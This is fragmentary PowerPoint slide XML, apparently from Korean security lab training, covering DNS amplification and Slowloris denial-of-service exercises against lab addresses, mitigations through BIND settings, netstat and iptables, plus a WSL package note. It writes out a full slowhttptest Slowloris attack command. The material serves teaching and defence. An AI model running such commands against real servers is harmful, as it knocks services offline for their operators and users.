            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>메시지 전송</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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDD7370-2AB2-4B53-B728-657DF13B3F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="1405466"/>
            <a:ext cx="5400040" cy="3317748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D526DA-061F-4F54-A958-6AE5D137648C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="940102"/>
            <a:ext cx="5400040" cy="1935607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10588D4-007E-41FA-BB9B-8B4E11F1FE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291462" y="3683301"/>
            <a:ext cx="5400040" cy="785368"/>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431329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증폭 공격 수행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 ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답이 지연됨을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Ctrl + C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 공격 중지</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ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답 시간이 정상으로 복구됨을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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084362D9-AA37-45BA-85EB-5B28E38164D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="715904"/>
            <a:ext cx="5400040" cy="1654556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80CDA9C7-D213-4BF4-A5B0-3E1F7E79154A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="2775808"/>
            <a:ext cx="5400040" cy="3307842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D382A9-BCB0-4FAD-90DC-3E573B44E54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="715904"/>
            <a:ext cx="5400040" cy="1909191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C110515D-8934-4EBD-9D2A-A518F8E0455C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="3206468"/>
            <a:ext cx="5400040" cy="2670048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327512324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id="{91563336-34FC-48F0-BDB5-EB9B3E13B470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392121"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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E6A2DB-FD5C-4AA2-A494-F01D7EEA6740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019628" y="989088"/>
            <a:ext cx="3985260" cy="47942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29652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일부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공격을 받는 중으로 보고되었다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설정을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하나의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 분당 요청할 수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쿼리의 수를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3B0801D1-9391-4CD4-B7B8-6A264D1A2AD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41564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1) wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</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2) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</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249B49EA-BD74-477E-BE2D-B290D96B4619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="711502"/>
            <a:ext cx="5400040" cy="3643884"/>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FC1C7637-0B41-4FAA-A8F7-F2A144ECFC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291462" y="711502"/>
            <a:ext cx="5400040" cy="3774059"/>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534511848"/>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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정 </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named.conf</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named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    #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pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/named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304715AE-F2D4-41B7-862C-8CAB30285A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="899280"/>
            <a:ext cx="5400040" cy="3046857"/>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689F28BD-F87C-43A6-9DAA-0E83A08F0439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="531887"/>
            <a:ext cx="5400040" cy="2961386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="직사각형 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24349896-23EB-465B-9AA6-7B5A35EBDB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694714" y="2816679"/>
            <a:ext cx="2506436" cy="481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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDFBB7A-FEBD-41D1-A96D-BA74B152BEF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="4973259"/>
            <a:ext cx="5400040" cy="561086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADDB49C-CF5A-4270-9020-7A4668FCB783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="5601572"/>
            <a:ext cx="5400040" cy="66141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88755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5) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷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5DF9B646-7D29-463F-82C6-FE73F865C07E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="703338"/>
            <a:ext cx="5400040" cy="3908806"/>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4BAB0F42-D264-4B56-9055-8697D1412C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6571343" y="760488"/>
            <a:ext cx="3360420" cy="754380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305830731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아파치 웹 서버가 동작하고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3" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB54BA98-243A-4E14-B824-BBBE2268CCC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411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공격 전 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시 접속 가능</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공격서버에서 실습서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowhttptest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -c 4000 -g -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10 -r 100 -t GET -x 3 -p 3 –u http://10.10.1.101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47859000">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078FAAE2-E477-41F2-AE13-F4AA63DAD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0560"/>
            <a:ext cx="5400675" cy="3957638"/>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247860280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F8E71E-1C3D-4BB0-9660-B684439BC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5" y="890065"/>
            <a:ext cx="5400675" cy="323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7970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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시도 시 접속 불가</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47860760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72ABFF5-7366-4F3A-9D09-C0CF0485C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911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47860440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD29B156-1DFE-4589-BD6F-F7FF5BA3B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9088" y="938784"/>
            <a:ext cx="39084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46147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3073" name="_x247863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9807132F-769D-4F8D-A491-7B45DF7F71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9491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500181" y="906487"/>
            <a:ext cx="5400674" cy="2104611"/>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7"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611964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아파치 웹 서버가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정상적인 서비스가 불가능한 상황이다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A945EE6F-447F-47A7-A88B-6A750291CB2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06312"/>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공격이 들어오는지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</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웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a: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localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 시도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iptable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -A INPUT -s 10.10.1.166 -j DROP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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 접속</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47859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE161DF9-0C62-4686-BEA6-25938C696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877824"/>
            <a:ext cx="5400675" cy="3208338"/>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47859320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE5AE86-8F64-44A8-A218-223DBDBA1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 y="4594988"/>
            <a:ext cx="4427538" cy="1363663"/>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47859160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A90F5E-D397-4FBF-9094-6E6818917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55957"/>
            <a:ext cx="54006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47859080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639FEAE2-9ACB-496E-BD5C-22BE5EA42C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5936" y="3090672"/>
            <a:ext cx="4694238" cy="198438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4105" name="_x247859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCFC429-5F60-4825-836F-B8069AE327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7832" y="3840480"/>
            <a:ext cx="5400675"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152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47860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BD1F33-A6EF-4486-B103-18677A276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980" y="719328"/>
            <a:ext cx="2522538"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71124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8301193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95977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73967381"/>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/Training/Unit/Web/3</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파일 다운로드에 대한 취약한 서버를 확인 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웹서버의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다운로드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게시물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Guest board/r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취약점 공격을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>대응</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할 수 있다</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804697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8199576"/>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87235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199181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/Environ/WSLOfflinePackageInstall</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  WSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>패키지 오프라인 설치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(bgpdump)</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http://archive.ubuntu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>원하는 패키지를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>본 예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
